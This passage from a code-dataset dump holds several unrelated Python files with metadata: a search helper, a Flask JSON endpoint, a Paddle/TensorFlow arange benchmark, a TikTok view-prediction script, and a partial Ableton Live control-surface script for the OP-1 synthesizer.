json_dict[json_dict[\"intentVariable\"]][json_dict[\"intentVariable\"]+\"Value\"]\n for field_name in json_dict:\n field_value_name = field_name+\"Value\"\n if field_name == \"intentVariable\" or field_name == \"intent\":\n pass\n elif field_value_name in json_dict[field_name] :\n if Backend_Helper.is_integer(json_dict[field_name][field_value_name]):\n value = int(json_dict[field_name][field_value_name])\n elif Backend_Helper.is_float(json_dict[field_name][field_value_name]):\n value = float(json_dict[field_name][field_value_name])\n else :\n value = json_dict[field_name][field_value_name]\n\n result.update({field_name:{field_value_name : [value],\"weight\":4}})\n\n result.update({intent_variable:{\"intent\":intent,\"value\":intent_variable_value,\"weight\":6}})\n\n return result\n\n\n\n\n\n @staticmethod\n def refineResult(docs):\n outputProducts = []\n\n for hit in docs['hits']['hits']:\n\n item = dict()\n\n for field in hit[\"_source\"]:\n item.update({field:hit[\"_source\"][field]})\n\n outputProducts.append(item)\n\n return outputProducts\n\n @staticmethod\n def is_integer(var) :\n try:\n int(var)\n return True\n except ValueError:\n return False\n\n @staticmethod\n def is_float(var) :\n try:\n float(var)\n return True\n except ValueError:\n return 
False\n","sub_path":"backend/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"572277588","text":"from flask import Flask, jsonify\nfrom flask import request\nimport random\nimport logging\nimport os\n\nHOST = os.environ.get('HOST')\nPORT = os.environ.get('PORT')\n\n\nclass Server_Flask:\n def __init__(self, host, port, queue=None):\n self.host = host\n self.port = port\n self.queue = queue\n self.screen_buffer = {'request_count': 0, 'F_status_count': 0, 'clients': {}, 'max': 0, 'min': 255}\n\n self.logger = logging.getLogger(\"TestAutomat.Flask_Server\")\n\n log = logging.getLogger('werkzeug')\n log.disabled = True\n\n def run(self):\n app = Flask(__name__)\n\n @app.route(\"/\", methods=['GET', 'POST'])\n def index():\n self.screen_buffer['request_count'] += 1\n if request.method == 'GET':\n msg = {'error': {'code': 400, 'message': 'Only POST'}}\n return jsonify(msg)\n elif request.method == 'POST':\n ct = request.headers.get('Content-Type')\n if ct.find('application/json') != 0:\n print(ct.find('application/json'))\n msg = {'error': {'code': 400, 'message': 'Only json'}}\n return jsonify(msg)\n else:\n msg = {'error': {'code': 405, 'message': 'Method Not Allowed'}}\n return jsonify(msg)\n\n data = request.get_json(silent=True)\n if data is None:\n msg = {'error': {'code': 400, 'message': 'Bad json'}}\n return jsonify(msg)\n\n if 'x' not in data or 'status' not in data or 'id' not in data:\n msg = {'error': {'code': 400, 'message': 'Bad Request (status or x)'}}\n return jsonify(msg)\n\n count = 1\n if data['id'] in self.screen_buffer['clients']:\n count = self.screen_buffer['clients'][data['id']]['count'] + 1\n self.screen_buffer['clients'][data['id']] = {'status': data['status'], 'count': count}\n\n r = random.randint(1, 255)\n y = data['x'] % r\n self.screen_buffer['max'] = max(self.screen_buffer['max'], count)\n\n if self.screen_buffer['clients'][data['id']]['status'] == 'F':\n self.screen_buffer['min'] = min(self.screen_buffer['min'], count)\n self.screen_buffer['F_status_count'] += 1\n\n if self.queue is not None:\n self.queue.put(self.screen_buffer)\n\n json_response = {'message': {'x': data['x'], 'y': y}}\n return jsonify(json_response)\n\n app.run(host=self.host, port=self.port, debug=False)\n\n\nif __name__ == \"__main__\":\n srv = Server_Flask(HOST, PORT)\n srv.run()\n","sub_path":"server_flask.py","file_name":"server_flask.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"498627439","text":"# Copyright (c) 2021 PaddlePaddle Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom common_import import *\n\n\nclass PDArange(PaddleAPIBenchmarkBase):\n def build_program(self, config):\n result = paddle.arange(\n start=config.start,\n end=config.end,\n step=config.step,\n dtype=config.dtype)\n\n self.feed_vars = []\n self.fetch_vars = [result]\n\n\nclass TFArange(TensorflowAPIBenchmarkBase):\n def build_graph(self, config):\n result = tf.range(\n start=config.start,\n limit=config.end,\n delta=config.step,\n dtype=config.dtype)\n\n self.feed_list = []\n self.fetch_list = [result]\n\n\nif __name__ == '__main__':\n test_main(PDArange(), TFArange(), config=APIConfig(\"arange\"))\n","sub_path":"api/tests_v2/arange.py","file_name":"arange.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"349810029","text":"from scipy import stats\nimport time\n\nfrom data_extraction import extract_data\n\ndef reject_outliers(video_views, video_times, outlier_sensitivity, videos_for_virality, num_days):\n #Reject outlier videos and videos from last two days\n\n #Internal variables\n current_time = time.time()\n days = 60*60*24 * num_days\n odds_of_virality = 0\n x_filtered = []\n video_views_filtered = []\n\n #Creating a list of the filtered videos and the video grid\n for index, value in enumerate(video_views):\n\n if ((current_time - video_times[index]) > days):\n if (stats.zscore(video_views)[index] < outlier_sensitivity):\n video_views_filtered.append(value)\n x_filtered.append(index)\n\n #Counting number of viral videos from past 10 videos and converting to odds of virality\n elif(len(video_views)-index < videos_for_virality):\n odds_of_virality += 1/videos_for_virality\n\n return [x_filtered,video_views_filtered, odds_of_virality]\n\n#Fitting the model to filtered data\ndef fit_model(x_filtered, video_views_filtered, video_views):\n\n x=[i for i in range(len(video_views))]\n slope, intercept, r_value, p_value, std_err = stats.linregress(x_filtered, video_views_filtered)\n next_video_views = slope*(len(video_views)) + intercept\n\n return [slope, intercept, p_value, next_video_views, x]\n\n#Create a dictionary to send to the api request\ndef create_data(x, video_views, x_filtered, video_views_filtered, slope, intercept, p_value, next_video_views, odds_of_virality, outlier_sensitivity, followers, total_likes, user_id):\n data = {\"video number\":x,\n \"video views\":video_views,\n \"filtered video number\":x_filtered,\n \"filtered video views\":video_views_filtered,\n \"odds of viral video\":odds_of_virality,\n \"slope\":slope,\n \"intercept\":intercept,\n \"p value\":p_value,\n \"predicted views\":next_video_views,\n \"outlier senitivity\":outlier_sensitivity,\n \"follower count\":followers,\n \"total likes\":total_likes,\n \"user name\":user_id\n }\n return data\n\n#The main function which calls all other functions\ndef model(user):\n\n #Default variables\n videos_num = 101 #Number of videos wanted\n 
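# reject_outliers keeps a video in the trend fit only when it is older than num_days and\n # its view-count z-score is under outlier_sensitivity; recent uploads count toward the virality odds.\n 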
videos_for_virality = 10 #Number of videos to check for virality\n num_days = 2 #Num of days to ignore\n\n #Defining list of various sensitivies and number of videos to check back.\n sensitivities = [0.1*i for i in range(1,11)]\n result_list = [10*i for i in range(1,11)]\n p_values=[]\n values=[]\n\n #Extracting the data using the tiktokapi\n video_views, video_times, followers, total_likes, user_id = extract_data(user, videos_num)\n\n #Checking the p_value for various video numbers and sensitivities\n for result in result_list:\n for outlier_sensitivity in sensitivities:\n video_views = video_views[-result:]\n video_times = video_times[-result:]\n x_filtered, video_views_filtered, odds_of_virality = reject_outliers(video_views, video_times, outlier_sensitivity, videos_for_virality, num_days)\n slope, intercept, p_value, next_video_views, x = fit_model(x_filtered, video_views_filtered, video_views)\n values.append((result, outlier_sensitivity))\n p_values.append(p_value)\n\n #Choosing the video with best p_value\n result, outlier_sensitivity = values[p_values.index(max(p_values))]\n\n #Using the relevant part of the data according to above p_value (without re-extracting the data for perfomance purposes)\n video_views = video_views[-result:]\n video_times = video_times[-result:]\n\n #Refiting the data with the best p_value and creating the data that will be sent to the client\n x_filtered, video_views_filtered, odds_of_virality = reject_outliers(video_views, video_times, outlier_sensitivity, videos_for_virality, num_days)\n slope, intercept, p_value, next_video_views, x = fit_model(x_filtered, video_views_filtered, video_views)\n data = create_data(x, video_views, x_filtered, video_views_filtered, slope, intercept, p_value, next_video_views, odds_of_virality, outlier_sensitivity, followers, total_likes, user_id)\n\n return data\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"190957572","text":"##################################################################\r\n#\r\n# Copyright (C) 2012 Imaginando, Lda & Teenage Engineering AB\r\n#\r\n# This program is free software; you can redistribute it and/or\r\n# modify it under the terms of the GNU General Public License\r\n# as published by the Free Software Foundation; either version 2\r\n# of the License, or any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n# GNU General Public License for more details.\r\n#\r\n# For more information about this license please consult the\r\n# following webpage: http://www.gnu.org/licenses/gpl-2.0.html\r\n#\r\n##################################################################\r\n\r\n# OP-1 Python Scripts V0.0.1 (Abel custom)\r\n# Customization by: Abel Allison\r\n\r\nfrom functools import partial\r\nimport time\r\n\r\nimport Live\r\n\r\n\r\n# Ableton Live Framework imports\r\nfrom _Framework.ButtonElement import ButtonElement\r\nfrom _Framework.ButtonMatrixElement import ButtonMatrixElement\r\nfrom _Framework.ComboElement import ComboElement\r\nfrom _Framework.ControlSurface import ControlSurface\r\nfrom _Framework.DeviceComponent import DeviceComponent\r\nfrom _Framework.EncoderElement import EncoderElement\r\nfrom _Framework.Layer import Layer\r\nfrom _Framework.MixerComponent import MixerComponent\r\nfrom _Framework.Resource import PrioritizedResource\r\nfrom _Framework.SessionComponent import SessionComponent\r\nfrom _Framework.TransportComponent import TransportComponent\r\n\r\n# Provides many constants\r\nfrom _Framework.InputControlElement import *\r\n\r\n# Utils from APC libs\r\nfrom _APC import ControlElementUtils as APCUtils\r\nfrom _APC.DetailViewCntrlComponent import DetailViewCntrlComponent\r\n\r\nfrom . import modes\r\nfrom . import ui\r\nfrom .consts import *\r\nfrom .ShiftEnabledControl import ShiftEnabledControl\r\nfrom .util import color_to_bytes\r\nfrom .util import midi_bytes_to_values\r\n\r\nCOLOR_BLACK_BYTES = [0x00, 0x00, 0x00]\r\nCOLOR_WHITE_BYTES = [0x7F, 0x7F, 0x7F]\r\n\r\nCONNECTION_MAX_RETRIES = 5\r\n\r\nENCODER_MODE = Live.MidiMap.MapMode.relative_two_compliment\r\n\r\n#\r\n# OP-1 Internal Implementation Constants\r\n#\r\n\r\nENABLE_SEQUENCE = (0xf0, 0x00, 0x20, 0x76, 0x00, 0x01, 0x02, 0xf7)\r\nDISABLE_SEQUENCE = (0xf0, 0x00, 0x20, 0x76, 0x00, 0x01, 0x00, 0xf7)\r\nID_SEQUENCE = (0xf0, 0x7e, 0x7f, 0x06, 0x01, 0xf7)\r\n\r\n\r\nclass OP1(ControlSurface):\r\n\tdef __init__(self, *args, **kwargs):\r\n\t\tControlSurface.__init__(self, *args, **kwargs)\r\n\r\n\t\tself.log_message('__init__()')\r\n\t\tself.show_message(\"Version: \" + VERSION)\r\n\r\n\t\t# Data for tracking connection attempts\r\n\t\tself.device_connected = False\r\n\t\tself.next_retry_delay = 1\r\n\t\tself.next_retry_ts = None\r\n\t\tself.retries_count = 0\r\n\t\tself._current_midi_map = None\r\n\r\n\t\t# State of display text\r\n\t\tself.text_top = ''\r\n\t\tself.text_bottom = ''\r\n\r\n\t\t# State of display key slots\r\n\t\tself.display_color_by_slot_num = {}\r\n\t\tfor i in range(NUM_DISPLAY_CLIP_SLOTS):\r\n\t\t \tself.display_color_by_slot_num[i] = COLOR_BLACK_BYTES\r\n\r\n\t\twith self.component_guard():\r\n\t\t\tself._build_components()\r\n\t\t\tself.init_modes()\r\n\t#\r\n\t# Ableton Helpers\r\n\t#\r\n\r\n\t@property\r\n\tdef num_tracks(self):\r\n\t\treturn min(NUM_TRACKS, len(self.song().tracks))\r\n\r\n\t@property\r\n\tdef num_scenes(self):\r\n\t\treturn min(NUM_SCENES, len(self.song().scenes))\r\n\r\n\t@property\r\n\tdef selected_track(self):\r\n\t\treturn self.song().view.selected_track\r\n\r\n\t@property\r\n\tdef selected_track_num(self):\r\n\t\treturn list(self.song().tracks).index(self.selected_track)\r\n\r\n\t@property\r\n\tdef selected_scene(self):\r\n\t\treturn self.song().view.selected_scene\r\n\r\n\t@property\r\n\tdef selected_scene_num(self):\r\n\t\treturn list(self.song().scenes).index(self.selected_scene)\r\n\r\n\t@property\r\n\tdef selected_clip_slot(self):\r\n\t\treturn 
self.selected_track.clip_slots[self.selected_scene_num]\r\n\r\n\t@property\r\n\tdef selected_device(self):\r\n\t\treturn self.selected_track.view.selected_device\r\n\r\n\tdef get_selected_track_devices(self, class_name):\r\n\t\treturn [\r\n\t\t\tdevice for device in self.selected_track.devices\r\n\t\t\tif device.class_name == class_name\r\n\t\t]\r\n\r\n\t#\r\n\t# Connected Components\r\n\t#\r\n\r\n\tdef _with_shift(self, control):\r\n\t\treturn ComboElement(control, modifiers=[self._button_shift])\r\n\r\n\tdef _build_components(self):\r\n\r\n\t\tself._buttons = {}\r\n\t\tfor identifier in range(5, 53) + range(64, 68):\r\n\t\t\t# We create the shift button in a special way\r\n\t\t\tif identifier == OP1_SHIFT_BUTTON:\r\n\t\t\t\tcontinue\r\n\t\t\t# Encoders present as buttons when values are changed\r\n\t\t\tbutton = APCUtils.make_pedal_button(identifier)\r\n\t\t\tbutton.add_value_listener(self.debug_button_handler)\r\n\t\t\tself._buttons[identifier] = button\r\n\r\n\t\t# Encoder buttons\r\n\t\t# See notes below for explanation of exclusion of first button\r\n\t\t# for identifier in [OP1_ENCODER_2_BUTTON, OP1_ENCODER_3_BUTTON, OP1_ENCODER_4_BUTTON]:\r\n\t\t# \tbutton = APCUtils.make_pedal_button(identifier)\r\n\t\t# \tbutton.add_value_listener(self.debug_button_handler)\r\n\t\t# \tAPCUtils.make_pedal_button(identifier] = butto)\r\n\r\n\t\tself._notes = {}\r\n\t\tfor identifier in range(OP1_MIN_NOTE, OP1_MAX_NOTE+1):\r\n\t\t\tnote = APCUtils.make_button(CHANNEL, identifier)\r\n\t\t\tnote.add_value_listener(self.debug_note_handler)\r\n\t\t\tself._notes[identifier] = note\r\n\r\n\t\t# Buttons\r\n\t\tself._button_shift = ButtonElement(\r\n\t\t\tis_momentary=True,\r\n\t\t\tmsg_type=MIDI_CC_TYPE,\r\n\t\t\tchannel=0,\r\n\t\t\tidentifier=OP1_SHIFT_BUTTON,\r\n\t\t\t# Required for modifier buttons\r\n\t\t\tresource_type=PrioritizedResource,\r\n\t\t\tname='ShiftButton',\r\n\t\t)\r\n\t\t# self._button_shift.add_value_listener(self.on_shift_button)\r\n\r\n\t\tself._button_mode_synth = self._buttons[OP1_MODE_1_BUTTON]\r\n\t\tself._button_mode_drum = self._buttons[OP1_MODE_2_BUTTON]\r\n\t\tself._button_mode_tape = self._buttons[OP1_MODE_3_BUTTON]\r\n\t\tself._button_mode_mixer = self._buttons[OP1_MODE_4_BUTTON]\r\n\r\n\t\tself._button_mode_1 = self._buttons[OP1_T1_BUTTON]\r\n\t\tself._button_mode_2 = self._buttons[OP1_T2_BUTTON]\r\n\t\tself._button_mode_3 = self._buttons[OP1_T3_BUTTON]\r\n\t\tself._button_mode_4 = self._buttons[OP1_T4_BUTTON]\r\n\r\n\t\tself._button_down = self._buttons[OP1_ARROW_DOWN_BUTTON]\r\n\t\tself._button_up = self._buttons[OP1_ARROW_UP_BUTTON]\r\n\t\tself._button_left = self._buttons[OP1_LEFT_ARROW]\r\n\t\tself._button_right = self._buttons[OP1_RIGHT_ARROW]\r\n\r\n\t\tself._button_metronome = self._buttons[OP1_METRONOME_BUTTON]\r\n\t\tself._button_scissors = self._buttons[OP1_SCISSOR_BUTTON]\r\n\r\n\t\tself._button_ss1 = self._buttons[OP1_SS1_BUTTON]\r\n\t\tself._button_ss2 = self._buttons[OP1_SS2_BUTTON]\r\n\t\tself._button_ss3 = self._buttons[OP1_SS3_BUTTON]\r\n\t\tself._button_ss4 = self._buttons[OP1_SS4_BUTTON]\r\n\t\tself._button_ss5 = self._buttons[OP1_SS5_BUTTON]\r\n\t\tself._button_ss6 = self._buttons[OP1_SS6_BUTTON]\r\n\t\tself._button_ss7 = self._buttons[OP1_SS7_BUTTON]\r\n\t\tself._button_ss8 = self._buttons[OP1_SS8_BUTTON]\r\n\r\n\t\tself._button_record = self._buttons[OP1_REC_BUTTON]\r\n\t\tself._button_play = self._buttons[OP1_PLAY_BUTTON]\r\n\t\tself._button_stop = self._buttons[OP1_STOP_BUTTON]\r\n\r\n\t\tself._button_microphone = 
self._buttons[OP1_MICROPHONE]\r\n\t\tself._button_com = self._buttons[OP1_COM]\r\n\t\tself._button_sequencer = self._buttons[OP1_SEQUENCER]\r\n\r\n\t\t# Encoders\r\n\t\tself._encoder_1 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_ENCODER_1, ENCODER_MODE)\r\n\t\tself._encoder_2 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_ENCODER_2, ENCODER_MODE)\r\n\t\tself._encoder_3 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_ENCODER_3, ENCODER_MODE)\r\n\t\tself._encoder_4 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_ENCODER_4, ENCODER_MODE)\r\n\r\n\t\tself._unshift_encoder_1 = ShiftEnabledControl(self._encoder_1, self._button_shift, False, self)\r\n\t\tself._unshift_encoder_2 = ShiftEnabledControl(self._encoder_2, self._button_shift, False, self)\r\n\t\tself._unshift_encoder_3 = ShiftEnabledControl(self._encoder_3, self._button_shift, False, self)\r\n\t\tself._unshift_encoder_4 = ShiftEnabledControl(self._encoder_4, self._button_shift, False, self)\r\n\t\tself._shift_encoder_1 = ShiftEnabledControl(self._encoder_1, self._button_shift, True, self)\r\n\t\tself._shift_encoder_2 = ShiftEnabledControl(self._encoder_2, self._button_shift, True, self)\r\n\t\tself._shift_encoder_3 = ShiftEnabledControl(self._encoder_3, self._button_shift, True, self)\r\n\t\tself._shift_encoder_4 = ShiftEnabledControl(self._encoder_4, self._button_shift, True, self)\r\n\r\n\t\tself._encoder_u01_1 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U01_ENCODER_1, ENCODER_MODE)\r\n\t\tself._encoder_u01_2 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U01_ENCODER_2, ENCODER_MODE)\r\n\t\tself._encoder_u01_3 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U01_ENCODER_3, ENCODER_MODE)\r\n\t\tself._encoder_u01_4 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U01_ENCODER_4, ENCODER_MODE)\r\n\r\n\t\tself._unshift_encoder_u01_1 = ShiftEnabledControl(self._encoder_u01_1, self._button_shift, False, self)\r\n\t\tself._unshift_encoder_u01_2 = ShiftEnabledControl(self._encoder_u01_2, self._button_shift, False, self)\r\n\t\tself._unshift_encoder_u01_3 = ShiftEnabledControl(self._encoder_u01_3, self._button_shift, False, self)\r\n\t\tself._unshift_encoder_u01_4 = ShiftEnabledControl(self._encoder_u01_4, self._button_shift, False, self)\r\n\t\tself._shift_encoder_u01_1 = ShiftEnabledControl(self._encoder_u01_1, self._button_shift, True, self)\r\n\t\tself._shift_encoder_u01_2 = ShiftEnabledControl(self._encoder_u01_2, self._button_shift, True, self)\r\n\t\tself._shift_encoder_u01_3 = ShiftEnabledControl(self._encoder_u01_3, self._button_shift, True, self)\r\n\t\tself._shift_encoder_u01_4 = ShiftEnabledControl(self._encoder_u01_4, self._button_shift, True, self)\r\n\r\n\t\tself._encoder_u02_1 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U02_ENCODER_1, ENCODER_MODE)\r\n\t\tself._encoder_u02_2 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U02_ENCODER_2, ENCODER_MODE)\r\n\t\tself._encoder_u02_3 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U02_ENCODER_3, ENCODER_MODE)\r\n\t\tself._encoder_u02_4 = EncoderElement(MIDI_CC_TYPE, CHANNEL, OP1_U02_ENCODER_4, ENCODER_MODE)\r\n\r\n\t\t# NOTE: encoder_1_button conflicts with encoder_U03_4\r\n\t\tself._encoder_button_1 = self._buttons[OP1_ENCODER_1_BUTTON]\r\n\t\tself._encoder_button_2 = self._buttons[OP1_ENCODER_2_BUTTON]\r\n\t\tself._encoder_button_3 = self._buttons[OP1_ENCODER_3_BUTTON]\r\n\t\tself._encoder_button_4 = self._buttons[OP1_ENCODER_4_BUTTON]\r\n\r\n\t\tself._mixer = MixerComponent(\r\n\t\t\tnum_tracks=NUM_TRACKS,\r\n\t\t\tnum_returns=2,\r\n\t\t)\r\n\t\t# self._mixer.set_select_buttons(\r\n\t\t# 
\tprev_button=self._button_up,\r\n\t\t# \tnext_button=self._button_down,\r\n\t\t# )\r\n\t\t# self.map_mixer_controls_for_current_track()\r\n\r\n\t\tdef on_down_button(value):\r\n\t\t\tif value == BUTTON_ON:\r\n\t\t\t\tself.set_selected_scene(self.scene_offset + 1)\r\n\r\n\t\tdef on_up_button(value):\r\n\t\t\tif value == BUTTON_ON:\r\n\t\t\t\tself.set_selected_scene(self.scene_offset - 1)\r\n\r\n\t\tself.scene_offset = 0\r\n\t\tself.song().view.add_selected_scene_listener(self.selected_scene_changed)\r\n\t\tself._button_right.add_value_listener(on_down_button)\r\n\t\tself._button_left.add_value_listener(on_up_button)\r\n\r\n\t\tself._transport = TransportComponent()\r\n\t\tself._transport.set_metronome_button(self._button_metronome)\r\n\r\n\t\t#\r\n\t\t# Controls for navigating the bottom detail pane\r\n\t\t#\r\n\t\tself._device_navigation = DetailViewCntrlComponent()\r\n\r\n\t\t# Toggle hide/show of bottom detail pane\r\n\t\tself._device_navigation.set_detail_toggle_button(self._button_ss1)\r\n\r\n\t\t# Toggle between clip detail and effects detail in bottom detail pane\r\n\t\tself._device_navigation.set_device_clip_toggle_button(self._button_ss2)\r\n\r\n\t\t# Nav left/right in the device chain detail view in bottom pane\r\n\t\tself._device_navigation.device_nav_left_button.set_control_element(self._button_ss7)\r\n\t\tself._device_navigation.device_nav_right_button.set_control_element(self._button_ss8)\r\n\r\n\t\t# Clip firing\r\n\t\tself._notes[OP1_F3_NOTE].add_value_listener(partial(self.clip_fired, 0))\r\n\t\tself._notes[OP1_G3_NOTE].add_value_listener(partial(self.clip_fired, 1))\r\n\t\tself._notes[OP1_A3_NOTE].add_value_listener(partial(self.clip_fired, 2))\r\n\t\tself._notes[OP1_B3_NOTE].add_value_listener(partial(self.clip_fired, 3))\r\n\t\tself._notes[OP1_C4_NOTE].add_value_listener(partial(self.clip_fired, 4))\r\n\t\tself._notes[OP1_D4_NOTE].add_value_listener(partial(self.clip_fired, 5))\r\n\t\tself._notes[OP1_E4_NOTE].add_value_listener(partial(self.clip_fired, 6))\r\n\t\tself._notes[OP1_F4_NOTE].add_value_listener(partial(self.clip_fired, 7))\r\n\r\n\t\tself._button_scissors.add_value_listener(self.selected_clip_deleted)\r\n\r\n\t\t#\r\n\t\t# Device Controls\r\n\t\t#\r\n\r\n\t\t# self._device = DeviceComponent(\r\n\t\t# \tname='Device_Component',\r\n\t\t# \tis_enabled=False,\r\n\t\t# \tlayer=Layer(\r\n\t\t# \t\tparameter_controls=ButtonMatrixElement(rows=[[\r\n # \t\t\t\tself._encoder_u01_1,\r\n\t\t# \t\t\tself._encoder_u01_2,\r\n\t\t# \t\t\tself._encoder_u01_3,\r\n\t\t# \t\t\tself._encoder_u01_4,\r\n\t\t# \t\t\tself._encoder_u02_1,\r\n\t\t# \t\t\tself._encoder_u02_2,\r\n\t\t# \t\t\tself._encoder_u02_3,\r\n\t\t# \t\t\tself._encoder_u02_4,\r\n # \t\t]]),\r\n\t\t# \t\t# bank_buttons=ButtonMatrixElement(rows=[[\r\n\t\t# \t\t# \tself._encoder_button_1,\r\n\t\t# \t\t# \tself._encoder_button_2,\r\n\t\t# \t\t# \tself._encoder_button_3,\r\n\t\t# \t\t# \tself._encoder_button_4,\r\n\t\t# \t\t# ]]),\r\n\t\t# \t\tbank_prev_button=self._button_ss5,\r\n\t\t# \t\tbank_next_button=self._button_ss6,\r\n\t\t# \t\ton_off_button=self._button_record,\r\n\t\t# \t),\r\n\t\t# \tdevice_selection_follows_track_selection=True\r\n\t\t# )\r\n\t\t# self._device.set_enabled(True)\r\n\t\t# self.set_device_component(self._device)\r\n\r\n\t#\r\n\t# Mode configuration\r\n\t#\r\n\r\n\tdef init_modes(self):\r\n\t\tself.tracks_mode = modes.TracksMode(self)\r\n\t\tself.effects_mode = modes.EffectsMode(self)\r\n\r\n\t\tself.current_mode = 
None\r\n\r\n\t\tself._button_mode_synth.add_value_listener(\r\n\t\t\tpartial(self.on_mode_button, self.tracks_mode))\r\n\t\tself._button_mode_drum.add_value_listener(\r\n\t\t \tpartial(self.on_mode_button, self.effects_mode))\r\n\t\t# self._button_mode_3.add_value_listener(\r\n\t\t# \tpartial(self.on_mode_button, ))\r\n\t\t# self._button_mode_4.add_value_listener(\r\n\t\t# \tpartial(self.on_mode_button, ))\r\n\r\n\t\tself.set_mode(self.tracks_mode)\r\n\r\n\tdef set_mode(self, mode):\r\n\t\tself.log_message('set_mode()')\r\n\t\tif self.current_mode is not None:\r\n\t\t\tself.current_mode.deactivate()\r\n\t\tself.current_mode = mode\r\n\t\tself.current_mode.activate()\r\n\r\n\tdef on_mode_button(self, mode, value):\r\n\t\tif value:\r\n\t\t\tself.set_mode(mode)\r\n\r\n\t#\r\n\t# Shift Button Alternative modes\r\n\t#\r\n\r\n\tdef on_shift_button(self, value):\r\n\t\tif value == BUTTON_ON:\r\n\t\t\tself.log_message('shift on')\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tself.log_message('shift off')\r\n\t\t\tpass\r\n\r\n\t#\r\n\t# Scene selection\r\n\t#\r\n\r\n\tdef selected_scene_changed(self):\r\n\t\tself.log_message('selected_scene_changed()')\r\n\t\tself.scene_offset = self.selected_scene_num\r\n\t\tself.map_clip_controls_for_current_scene()\r\n\r\n\tdef set_selected_scene(self, scene_offset):\r\n\t\tscene_offset = max(0, scene_offset)\r\n\t\tscene_offset = min(scene_offset, self.num_scenes-1)\r\n\r\n\t\tnext_scene = self.song().scenes[scene_offset]\r\n\t\tnext_scene = self.song().view.selected_scene = next_scene\r\n\r\n\t\tself.scene_offset = scene_offset\r\n\r\n\tdef clear_key_assignments(self):\r\n\t\tpass\r\n\r\n\tdef map_clip_controls_for_current_scene(self):\r\n\t\tfor clip_slot in self.selected_scene.clip_slots:\r\n\t\t\tpass\r\n\r\n\t#\r\n\t# Clip triggers\r\n\t#\r\n\r\n\tdef clip_fired(self, clip_num, value):\r\n\t\tif value == NOTE_ON:\r\n\r\n\t\t\tself.log_message('clip_fired(clip_num=%s, value=%s)' % (clip_num, value))\r\n\t\t\tclip_slot = self.selected_track.clip_slots[clip_num]\r\n\r\n\t\t\t# if clip_slot.is_playing:\r\n\t\t\t# \tself.log_message('stoping clip')\r\n\t\t\t# \tclip_slot.stop()\r\n\t\t\t# else:\r\n\t\t\t# \tself.log_message('firing clip. has_clip=%s has_stop=%s, playing_status=%s' % (\r\n\t\t\t# \t\tclip_slot.has_clip,\r\n\t\t\t# \t\tclip_slot.has_stop_button,\r\n\t\t\t# \t\tclip_slot.playing_status,\r\n\t\t\t# \t))\r\n\t\t\t# \tclip_slot.fire()\r\n\r\n\t\t\tself.log_message('firing clip. 
has_clip=%s has_stop=%s, playing_status=%s' % (\r\n\t\t\t\tclip_slot.has_clip,\r\n\t\t\t\tclip_slot.has_stop_button,\r\n\t\t\t\tclip_slot.playing_status,\r\n\t\t\t))\r\n\t\t\tclip_slot.fire()\r\n\r\n\r\n\r\n\t\t\t# Update scene selection to fired clip's row.\r\n\t\t\tself.set_selected_scene(clip_num)\r\n\r\n\tdef selected_clip_deleted(self, value):\r\n\t\tif value == BUTTON_ON:\r\n\t\t\tself.log_message('deleting clip')\r\n\t\t\tself.selected_clip_slot.delete_clip()\r\n\r\n\t#\r\n\t# Looper triggers\r\n\t#\r\n\r\n\tdef looper_fired(looper_device):\r\n\t\tfire_param = [param for param in looper_device.parameters if param.name == 'State']\r\n\t\tself.log_message(fire_param)\r\n\r\n\t#\r\n\t# Refresh handling\r\n\t#\r\n\r\n\tdef handle_sysex(self, midi_bytes):\r\n\t\tsuper(OP1, self).handle_sysex(midi_bytes)\r\n\t\tif (len(midi_bytes) >= 8 and (midi_bytes[6]==32) and (midi_bytes[7]==118)):\r\n\t\t\tself.handle_device_connection_success()\r\n\t\telse:\r\n\t\t\tself.log_message(\"sysex: %s\" % (midi_bytes, ))\r\n\r\n\tdef refresh_state(self):\r\n\t\tsuper(OP1, self).refresh_state()\r\n\r\n\t\tself.log_message(\"refresh_state()\")\r\n\t\tself.retries_count = 0\r\n\t\tself.next_retry_ts = None\r\n\t\tself.next_retry_delay = 1\r\n\t\tself.device_connected = False\r\n\r\n\tdef update_display(self):\r\n\t\tsuper(OP1, self).update_display()\r\n\r\n\t\tif not(self.device_connected):\r\n\t\t\tif self.next_retry_ts is None or time.time() >= self.next_retry_ts:\r\n\t\t\t\tself.attempt_connection_with_device()\r\n\t\t\treturn\r\n\r\n\t\t# Render the currently active view\r\n\t\tself.current_mode.view.render()\r\n\r\n\t#\r\n\t# Connection Management\r\n\t#\r\n\r\n\tdef build_midi_map(self, midi_map_handle):\r\n\t\tsuper(OP1, self).build_midi_map(midi_map_handle)\r\n\r\n\t\t# map mixer controls to currently selected track\r\n\t\t# 